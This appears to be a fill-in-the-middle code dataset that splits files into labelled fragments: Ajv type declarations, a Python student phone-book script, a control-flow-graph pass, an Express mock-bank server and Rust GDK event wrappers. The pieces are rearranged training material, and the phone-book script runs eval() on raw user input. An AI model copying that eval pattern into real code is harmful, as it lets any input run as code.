compileAsync<T = unknown>(schema: AsyncSchema, meta?: boolean): Promise<AsyncValidateFunction<T>>;
compileAsync<T = unknown>(schema: AnySchemaObject, meta?: boolean): Promise<AnyValidateFunction<T>>;
addSchema(schema: AnySchema | AnySchema[], // If array is passed, `key` will be ignored
key?: string, // Optional schema key. Can be passed to `validate` method instead of schema object or id/ref. One schema per instance can have empty `id` and `key`.
_meta?: boolean, // true if schema is a meta-schema. Used internally, addMetaSchema should be used instead.
_validateSchema?: boolean | "log"): Ajv;
addMetaSchema(schema: AnySchemaObject, key?: string, // schema key
_validateSchema?: boolean | "log"): Ajv;
validateSchema(schema: AnySchema, throwOrLogError?: boolean): boolean | Promise<unknown>;
getSchema<T = unknown>(keyRef: string): AnyValidateFunction<T> | undefined;
removeSchema(schemaKeyRef?: AnySchema | string | RegExp): Ajv;
addVocabulary(definitions: Vocabulary): Ajv;
addKeyword(kwdOrDef: string | KeywordDefinition, def?: KeywordDefinition): Ajv;
getKeyword(keyword: string): AddedKeywordDefinition | boolean;
removeKeyword(keyword: string): Ajv;
addFormat(name: string, format: Format): Ajv;
errorsText(errors?: ErrorObject[] | null | undefined, // optional array of validation errors
{ separator, dataVar }?: ErrorsTextOptions): string;
$dataMetaSchema(metaSchema: AnySchemaObject, keywordsJsonPointers: string[]): AnySchemaObject;
private _removeAllSchemas;
private _addSchema;
private _checkUnique;
private _compileSchemaEnv;
private _compileMetaSchema;
}
export interface ErrorsTextOptions {
separator?: string;
dataVar?: string;
}
| Ajv | identifier_name |
core.d.ts | export { Format, FormatDefinition, AsyncFormatDefinition, KeywordDefinition, KeywordErrorDefinition, CodeKeywordDefinition, MacroKeywordDefinition, FuncKeywordDefinition, Vocabulary, Schema, SchemaObject, AnySchemaObject, AsyncSchema, AnySchema, ValidateFunction, AsyncValidateFunction, ErrorObject, } from "./types";
export { SchemaCxt, SchemaObjCxt } from "./compile";
export interface Plugin<Opts> {
(ajv: Ajv, options?: Opts): Ajv;
[prop: string]: any;
}
import KeywordCxt from "./compile/context";
export { KeywordCxt };
export { DefinedError } from "./vocabularies/errors"; | import type { Schema, AnySchema, AnySchemaObject, SchemaObject, AsyncSchema, Vocabulary, KeywordDefinition, AddedKeywordDefinition, AnyValidateFunction, ValidateFunction, AsyncValidateFunction, ErrorObject, Format, AddedFormat } from "./types";
import type { JSONSchemaType } from "./types/json-schema";
import { ValidationError, MissingRefError } from "./compile/error_classes";
import { ValidationRules } from "./compile/rules";
import { SchemaEnv } from "./compile";
import { Code, ValueScope } from "./compile/codegen";
export declare type Options = CurrentOptions & DeprecatedOptions;
interface CurrentOptions {
strict?: boolean | "log";
strictTypes?: boolean | "log";
strictTuples?: boolean | "log";
allowMatchingProperties?: boolean;
allowUnionTypes?: boolean;
validateFormats?: boolean;
$data?: boolean;
allErrors?: boolean;
verbose?: boolean;
$comment?: true | ((comment: string, schemaPath?: string, rootSchema?: AnySchemaObject) => unknown);
formats?: {
[Name in string]?: Format;
};
keywords?: Vocabulary;
schemas?: AnySchema[] | {
[key: string]: AnySchema;
};
logger?: Logger | false;
loadSchema?: (uri: string) => Promise<AnySchemaObject>;
removeAdditional?: boolean | "all" | "failing";
useDefaults?: boolean | "empty";
coerceTypes?: boolean | "array";
next?: boolean;
unevaluated?: boolean;
dynamicRef?: boolean;
meta?: SchemaObject | boolean;
defaultMeta?: string | AnySchemaObject;
validateSchema?: boolean | "log";
addUsedSchema?: boolean;
inlineRefs?: boolean | number;
passContext?: boolean;
loopRequired?: number;
loopEnum?: number;
ownProperties?: boolean;
multipleOfPrecision?: boolean | number;
messages?: boolean;
code?: CodeOptions;
}
export interface CodeOptions {
es5?: boolean;
lines?: boolean;
optimize?: boolean | number;
formats?: Code;
source?: boolean;
process?: (code: string, schema?: SchemaEnv) => string;
}
interface InstanceCodeOptions extends CodeOptions {
optimize: number;
}
interface DeprecatedOptions {
/** @deprecated */
ignoreKeywordsWithRef?: boolean;
/** @deprecated */
jsPropertySyntax?: boolean;
/** @deprecated */
unicode?: boolean;
}
declare type RequiredInstanceOptions = {
[K in "strict" | "strictTypes" | "strictTuples" | "inlineRefs" | "loopRequired" | "loopEnum" | "meta" | "messages" | "addUsedSchema" | "validateSchema" | "validateFormats"]: NonNullable<Options[K]>;
} & {
code: InstanceCodeOptions;
};
export declare type InstanceOptions = Options & RequiredInstanceOptions;
export interface Logger {
log(...args: unknown[]): unknown;
warn(...args: unknown[]): unknown;
error(...args: unknown[]): unknown;
}
export default class Ajv {
opts: InstanceOptions;
errors?: ErrorObject[] | null;
logger: Logger;
readonly scope: ValueScope;
readonly schemas: {
[key: string]: SchemaEnv | undefined;
};
readonly refs: {
[ref: string]: SchemaEnv | string | undefined;
};
readonly formats: {
[name: string]: AddedFormat | undefined;
};
readonly RULES: ValidationRules;
readonly _compilations: Set<SchemaEnv>;
private readonly _loading;
private readonly _cache;
private readonly _metaOpts;
static ValidationError: typeof ValidationError;
static MissingRefError: typeof MissingRefError;
constructor(opts?: Options);
_addVocabularies(): void;
_addDefaultMetaSchema(): void;
defaultMeta(): string | AnySchemaObject | undefined;
validate(schema: Schema | string, data: unknown): boolean;
validate(schemaKeyRef: AnySchema | string, data: unknown): boolean | Promise<unknown>;
validate<T>(schema: Schema | JSONSchemaType<T> | string, data: unknown): data is T;
validate<T>(schema: AsyncSchema, data: unknown | T): Promise<T>;
validate<T>(schemaKeyRef: AnySchema | string, data: unknown): data is T | Promise<T>;
compile<T = unknown>(schema: Schema | JSONSchemaType<T>, _meta?: boolean): ValidateFunction<T>;
compile<T = unknown>(schema: AsyncSchema, _meta?: boolean): AsyncValidateFunction<T>;
compile<T = unknown>(schema: AnySchema, _meta?: boolean): AnyValidateFunction<T>;
compileAsync<T = unknown>(schema: SchemaObject | JSONSchemaType<T>, _meta?: boolean): Promise<ValidateFunction<T>>;
compileAsync<T = unknown>(schema: AsyncSchema, meta?: boolean): Promise<AsyncValidateFunction<T>>;
compileAsync<T = unknown>(schema: AnySchemaObject, meta?: boolean): Promise<AnyValidateFunction<T>>;
addSchema(schema: AnySchema | AnySchema[], // If array is passed, `key` will be ignored
key?: string, // Optional schema key. Can be passed to `validate` method instead of schema object or id/ref. One schema per instance can have empty `id` and `key`.
_meta?: boolean, // true if schema is a meta-schema. Used internally, addMetaSchema should be used instead.
_validateSchema?: boolean | "log"): Ajv;
addMetaSchema(schema: AnySchemaObject, key?: string, // schema key
_validateSchema?: boolean | "log"): Ajv;
validateSchema(schema: AnySchema, throwOrLogError?: boolean): boolean | Promise<unknown>;
getSchema<T = unknown>(keyRef: string): AnyValidateFunction<T> | undefined;
removeSchema(schemaKeyRef?: AnySchema | string | RegExp): Ajv;
addVocabulary(definitions: Vocabulary): Ajv;
addKeyword(kwdOrDef: string | KeywordDefinition, def?: KeywordDefinition): Ajv;
getKeyword(keyword: string): AddedKeywordDefinition | boolean;
removeKeyword(keyword: string): Ajv;
addFormat(name: string, format: Format): Ajv;
errorsText(errors?: ErrorObject[] | null | undefined, // optional array of validation errors
{ separator, dataVar }?: ErrorsTextOptions): string;
$dataMetaSchema(metaSchema: AnySchemaObject, keywordsJsonPointers: string[]): AnySchemaObject;
private _removeAllSchemas;
private _addSchema;
private _checkUnique;
private _compileSchemaEnv;
private _compileMetaSchema;
}
export interface ErrorsTextOptions {
separator?: string;
dataVar?: string;
} | export { JSONType } from "./compile/rules";
export { JSONSchemaType } from "./types/json-schema";
export { _, str, stringify, nil, Name, Code, CodeGen, CodeGenOptions } from "./compile/codegen"; | random_line_split |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def | (x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | InsertRecord | identifier_name |
1_name_phone_number.py | student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else : | InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input() | random_line_split |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
|
Handler()
print(student_phoneNumber_name) | print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False | identifier_body |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
|
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ") | conditional_block |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def __init__(self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
| for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered | conditional_block |
|
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def | (self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered
| __init__ | identifier_name |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
|
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered
| def __init__(self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node) | identifier_body |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def __init__(self):
self.merges = [] | pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered |
@defaultdispatch
def default(self, node): | random_line_split |
server.js | #!/usr/bin/env node
"use strict";
// för pid-filen
const fs = require('fs');
const path = require('path');
var pid = `${process.pid}`;
// skriv pid-filen
var filepathPID = path.join(__dirname, "pid");
fs.writeFile(filepathPID, pid, (err) => {
if (err) { | console.log("PID saved at: " + __dirname);
});
// skapa express-severn
const bodyparser = require('body-parser');
var express = require('express');
var app = express();
var port = 1337;
var staticfiles = path.join(__dirname, 'public');
app.set("views", path.join(__dirname, "views"));
app.set("view engine", "pug");
app.locals.pretty = true;
app.use(bodyparser.urlencoded({ extended: true }));
app.use(express.static(staticfiles));
if ('LINUX_PORT' in process.env) {
port = `${process.env.LINUX_PORT}`;
console.log("LINUX_PORT is set to " + port + ".");
} else {
console.log("LINUX_PORT is set to " + port + ".");
console.log("Server running at http://127.0.0.1:" + port + " with PID: " + process.pid);
}
// ladda routes
const index = require('./routes/index.js');
app.use("/", index);
app.use("/index", index);
const login = require('./routes/login.js');
app.use("/login", login);
const startpage = require('./routes/startpage.js');
app.use("/startpage", startpage);
const movemoney = require('./routes/movemoney.js');
app.use("/movemoney", movemoney);
const swish = require('./routes/swish.js');
app.use("/swish", swish);
const createacc = require('./routes/createacc.js');
app.use("/createacc", createacc);
/*
const move = require('./routes/move.js');
app.use("/move", move);
const movereq = require('./routes/movereq.js');
app.use("/movereq", movereq);
*/
app.listen(port);
module.exports = app;
|
throw err;
}
| conditional_block |
server.js | #!/usr/bin/env node
"use strict";
// för pid-filen
const fs = require('fs');
const path = require('path');
var pid = `${process.pid}`;
// skriv pid-filen
var filepathPID = path.join(__dirname, "pid");
fs.writeFile(filepathPID, pid, (err) => {
if (err) {
throw err;
}
console.log("PID saved at: " + __dirname);
});
// skapa express-severn
const bodyparser = require('body-parser');
var express = require('express');
var app = express();
var port = 1337;
var staticfiles = path.join(__dirname, 'public');
app.set("views", path.join(__dirname, "views"));
app.set("view engine", "pug");
app.locals.pretty = true;
app.use(bodyparser.urlencoded({ extended: true }));
app.use(express.static(staticfiles));
if ('LINUX_PORT' in process.env) {
port = `${process.env.LINUX_PORT}`;
console.log("LINUX_PORT is set to " + port + ".");
} else {
console.log("LINUX_PORT is set to " + port + ".");
console.log("Server running at http://127.0.0.1:" + port + " with PID: " + process.pid);
}
// ladda routes
const index = require('./routes/index.js');
app.use("/", index);
app.use("/index", index);
const login = require('./routes/login.js');
app.use("/login", login);
const startpage = require('./routes/startpage.js');
app.use("/startpage", startpage);
const movemoney = require('./routes/movemoney.js');
app.use("/movemoney", movemoney);
const swish = require('./routes/swish.js');
app.use("/swish", swish);
const createacc = require('./routes/createacc.js'); | const move = require('./routes/move.js');
app.use("/move", move);
const movereq = require('./routes/movereq.js');
app.use("/movereq", movereq);
*/
app.listen(port);
module.exports = app; | app.use("/createacc", createacc);
/* | random_line_split |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn get_event_type(&self) -> EventType {
self.as_ref().type_
}
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
} | impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
} | }
}
| random_line_split |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn | (&self) -> EventType {
self.as_ref().type_
}
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
}
}
}
impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
}
| get_event_type | identifier_name |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn get_event_type(&self) -> EventType |
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
}
}
}
impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
}
| {
self.as_ref().type_
} | identifier_body |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
